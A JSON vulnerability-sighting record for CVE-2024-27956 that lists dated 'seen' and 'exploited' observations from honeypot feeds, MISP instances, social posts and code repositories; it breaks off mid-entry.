{"vulnerability": "CVE-2024-27956", "sightings": [{"uuid": "9cf6b643-b12b-41dd-94f2-7701e32230e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "a52fc5ff-62d5-405a-b488-fea90794febe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-05)", "content": "", "creation_timestamp": "2025-02-05T00:00:00.000000Z"}, {"uuid": "6d74d968-8e43-42bc-b3e9-7bf51653b328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-06)", "content": "", "creation_timestamp": "2025-02-06T00:00:00.000000Z"}, {"uuid": "a85b7ac4-6ef8-4d81-ac87-2041d0e740cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://bsky.app/profile/youranonriots.bsky.social/post/3llpczs22js2s", "content": "", "creation_timestamp": "2025-03-31T21:38:56.648344Z"}, {"uuid": "c1fa96c7-85ea-4779-ab62-d1dc8bdfa766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-04)", "content": "", "creation_timestamp": "2025-02-04T00:00:00.000000Z"}, {"uuid": "2ffe2e13-af22-4734-81ec-7e632dbdf1b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://bsky.app/profile/youranonriots.bsky.social/post/3llpcztm5322s", "content": "", "creation_timestamp": "2025-03-31T21:38:57.355871Z"}, {"uuid": "0c3a898f-99a8-4fcf-8cf4-9abcfc7d7b38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:01.000000Z"}, {"uuid": "04746b8d-8e72-4f57-95a6-8aff2151e589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-04)", "content": "", "creation_timestamp": "2025-03-04T00:00:00.000000Z"}, {"uuid": "e16cd21a-1983-4132-a016-099a50dde006", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-11)", "content": "", "creation_timestamp": "2025-02-11T00:00:00.000000Z"}, {"uuid": "1c8ae7fa-15f7-4a67-a049-84772c596f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-26)", "content": "", "creation_timestamp": "2025-03-26T00:00:00.000000Z"}, {"uuid": "fa775ff0-14d5-4eed-a4e9-07c3e9e687c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-13)", "content": "", "creation_timestamp": "2025-03-13T00:00:00.000000Z"}, {"uuid": "843fdba7-2b08-419e-b4b7-9ea6cadd60cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-21)", "content": "", "creation_timestamp": "2025-03-21T00:00:00.000000Z"}, {"uuid": "332cd754-5c16-44ab-993d-0e914b269463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3llf4jdmeu42l", "content": "", "creation_timestamp": "2025-03-27T20:15:48.644971Z"}, {"uuid": "1050d9d5-698d-4801-813a-16ae4bdea264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-21)", "content": "", "creation_timestamp": "2025-02-21T00:00:00.000000Z"}, {"uuid": "b1f8dcc7-8a79-4d38-8bf5-4a3ef0d227a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-02)", "content": "", "creation_timestamp": "2025-03-02T00:00:00.000000Z"}, {"uuid": "18366e26-8d46-4471-b9fc-9a08d77657ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-06)", "content": "", "creation_timestamp": "2025-03-06T00:00:00.000000Z"}, {"uuid": "755110b1-ee88-4421-8529-17cbc585af46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://gist.github.com/rastaa44/5cb49c48ef077755b79f8229d25a8a54", "content": "", "creation_timestamp": "2025-04-01T16:35:55.000000Z"}, {"uuid": "bc268cdc-1e12-4ae9-abe5-b448143fb9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://gist.github.com/rastaa44/a58f11fdfbe14944c9f1000ea9744a5e", "content": "", "creation_timestamp": "2025-04-01T16:34:43.000000Z"}, {"uuid": "df3952fa-6ef4-4197-8368-b0df5f783f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-21)", "content": "", "creation_timestamp": "2025-06-21T00:00:00.000000Z"}, {"uuid": "8c42b5f9-7f55-4200-a5d3-3f67e239d2b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/114284644630699455", "content": "", "creation_timestamp": "2025-04-05T09:28:05.828908Z"}, {"uuid": "924a5b16-0d21-48bf-9b5d-dd8d49e3e94c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/114284644630699455", "content": "", "creation_timestamp": "2025-04-05T09:28:05.827529Z"}, {"uuid": "4c254cd3-a51a-4545-96c6-fc4e21bfaf2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-18)", "content": "", "creation_timestamp": "2025-05-18T00:00:00.000000Z"}, {"uuid": "2836656e-30ae-45fc-82f4-32d220cdc55a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "5b28a591-c77c-44e8-b008-86f6bf19e64d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-07)", "content": "", "creation_timestamp": "2025-04-07T00:00:00.000000Z"}, {"uuid": "a0d79a40-28f8-460d-9fad-4cb881eeab10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "586bf284-c09a-4212-bdc5-0872b86db901", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-11)", "content": "", "creation_timestamp": "2025-04-11T00:00:00.000000Z"}, {"uuid": "af940e1b-7935-46ec-be25-e7f91dde87af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "f158f565-d5bf-4a99-ae16-1e6cb8ed5576", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-14)", "content": "", "creation_timestamp": "2025-04-14T00:00:00.000000Z"}, {"uuid": "38d15d56-c345-4872-ab0a-b440493e7e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-03)", "content": "", "creation_timestamp": "2025-07-03T00:00:00.000000Z"}, {"uuid": "3a1aa995-461c-41df-b6ee-ba68c2db3e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-19)", "content": "", "creation_timestamp": "2025-04-19T00:00:00.000000Z"}, {"uuid": "b3538744-0668-417a-92c3-69b814db77b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-30)", "content": "", "creation_timestamp": "2025-05-30T00:00:00.000000Z"}, {"uuid": "fd212b13-1fe6-48eb-91f0-fdea471c248d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-16)", "content": "", "creation_timestamp": "2025-05-16T00:00:00.000000Z"}, {"uuid": "adccae47-3dd3-4e67-9c03-72ba85df1e2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-24)", "content": "", "creation_timestamp": "2025-05-24T00:00:00.000000Z"}, {"uuid": "2b0271b5-dd55-46e8-b68a-f6f2c76014f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-22)", "content": "", "creation_timestamp": "2025-04-22T00:00:00.000000Z"}, {"uuid": "cdd78e15-c76d-4548-8b4f-b1038a840779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-26)", "content": "", "creation_timestamp": "2025-06-26T00:00:00.000000Z"}, {"uuid": "9862f437-ae0e-4c62-9906-b057bbca4431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-23)", "content": "", "creation_timestamp": "2025-04-23T00:00:00.000000Z"}, {"uuid": "1a8116d2-0eb8-4574-bf08-11d7ec60ee0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "0781dd36-2cb9-4683-9100-333009fa8ab0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-23)", "content": "", "creation_timestamp": "2025-06-23T00:00:00.000000Z"}, {"uuid": "59b49fd2-238f-41bd-a723-151378398474", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-22)", "content": "", "creation_timestamp": "2025-05-22T00:00:00.000000Z"}, {"uuid": "8d99f7e7-290f-458e-a321-c2f062a4b13c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "a4c601e2-2d74-41b4-93a7-db8a811530cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-25)", "content": "", "creation_timestamp": "2025-06-25T00:00:00.000000Z"}, {"uuid": "5eb86b56-2e16-4680-bace-e7d291db4004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-27)", "content": "", "creation_timestamp": "2025-05-27T00:00:00.000000Z"}, {"uuid": "77c1c4c6-a514-420b-90ca-86c6a033dea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-10)", "content": "", "creation_timestamp": "2025-05-10T00:00:00.000000Z"}, {"uuid": "643c06ba-c82a-4810-a329-7edee0178676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-11)", "content": "", "creation_timestamp": "2025-05-11T00:00:00.000000Z"}, {"uuid": "2354a858-972c-47b5-b0e6-67e28afcb450", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-20)", "content": "", "creation_timestamp": "2025-05-20T00:00:00.000000Z"}, {"uuid": "102462dc-a306-475f-b15c-a269527bb7c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-29)", "content": "", "creation_timestamp": "2025-05-29T00:00:00.000000Z"}, {"uuid": "87b61a99-82f1-4555-97a4-b0ab911640d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-06)", "content": "", "creation_timestamp": "2025-06-06T00:00:00.000000Z"}, {"uuid": "4bccc87d-1816-482f-a7ea-10cfe2481bc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-14)", "content": "", "creation_timestamp": "2025-05-14T00:00:00.000000Z"}, {"uuid": "9e1bfe0c-b258-4a73-954a-8b6fae4fcdf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:02.000000Z"}, {"uuid": "a4930737-5a36-4cc8-873d-bbe5e6a73030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-09-10T07:47:56.000000Z"}, {"uuid": "d732b7e0-ec77-4848-9fd8-ee6f43596d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-30)", "content": "", "creation_timestamp": "2025-07-30T00:00:00.000000Z"}, {"uuid": "2719b38b-722c-4ba3-a1c0-3d0cfc8d099d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-30)", "content": "", "creation_timestamp": "2025-07-30T00:00:00.000000Z"}, {"uuid": "a67afea4-6578-4090-bbc0-78ff64642553", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-02)", "content": "", "creation_timestamp": "2025-08-02T00:00:00.000000Z"}, {"uuid": "082d868f-56d4-4e79-b9e7-4a97c127f907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-04)", "content": "", "creation_timestamp": "2025-08-04T00:00:00.000000Z"}, {"uuid": "99fdf4d9-65da-44d4-8ad0-f135e3278f4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "MISP/f2f93f16-9318-44b1-9be3-2d3346ca540c", "content": "", "creation_timestamp": "2025-08-10T18:27:44.000000Z"}, {"uuid": "4ac5cfe1-d568-45fd-9b6f-790f22f816e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-14)", "content": "", "creation_timestamp": "2025-09-14T00:00:00.000000Z"}, {"uuid": "8d729eec-12ce-4714-8fe1-9362cf49516f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "63c3a85d-43b4-48e2-9f2c-cfd5062a4a02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "e821f7f0-7e58-4079-bf7f-92db844b0c22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-10)", "content": "", "creation_timestamp": "2025-11-10T00:00:00.000000Z"}, {"uuid": "f39e6bf8-e8fd-4962-9ced-5540350fed7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-30)", "content": "", "creation_timestamp": "2025-10-30T00:00:00.000000Z"}, {"uuid": "5f3f4f14-87d2-42d6-b9bd-e17ff4462679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-05)", "content": "", "creation_timestamp": "2025-11-05T00:00:00.000000Z"}, {"uuid": "e209708e-ed45-46fb-ab1d-78a7b7b07ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-19)", "content": "", "creation_timestamp": "2025-08-19T00:00:00.000000Z"}, {"uuid": "7445c1b3-14d9-4c28-b672-ed4701934c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-20)", "content": "", "creation_timestamp": "2025-08-20T00:00:00.000000Z"}, {"uuid": "2023da6b-5d5a-4fda-b3f6-933677d3dafd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "5e45db8e-104f-4573-9119-5a5f33205275", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "8e8ddc65-4b07-45c3-b052-b2b822c57a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-25)", "content": "", "creation_timestamp": "2025-08-25T00:00:00.000000Z"}, {"uuid": "b5eeec56-12b2-4936-a2f0-9bc65addc84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://gist.github.com/Darkcrai86/e316c38224b3eaf5f0ac8e81928e7d1e", "content": "", "creation_timestamp": "2025-08-29T17:32:10.000000Z"}, {"uuid": "6e3a6fcf-14fa-4b9c-86bc-2938036b0f84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_automatic_sqli_to_rce.rb", "content": "", "creation_timestamp": "2024-10-30T13:43:24.000000Z"}, {"uuid": "8a900f8b-2b99-4cf4-ab1e-5ac745f3122c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3m7cywycdl722", "content": "", "creation_timestamp": "2025-12-06T12:30:24.892267Z"}, {"uuid": "a6a7c679-bbfb-4c96-84f4-af775a9b2a2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-02-17)", "content": "", "creation_timestamp": "2026-02-17T00:00:00.000000Z"}, {"uuid": "f597f919-73ba-422a-8e15-95d3a3e03153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-02-05)", "content": "", "creation_timestamp": "2026-02-05T00:00:00.000000Z"}, {"uuid": "69ef0f1b-f211-4344-b760-10ce6ddfe7e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-02-18)", "content": "", "creation_timestamp": "2026-02-18T00:00:00.000000Z"}, {"uuid": "b655644b-2d67-464b-be34-d999d7cc6f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-02)", "content": "", "creation_timestamp": "2026-03-02T00:00:00.000000Z"}, {"uuid": "6ecbf5e9-12d2-4b01-bb13-4f5229e6b5a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-21)", "content": "", "creation_timestamp": "2025-12-21T00:00:00.000000Z"}, {"uuid": 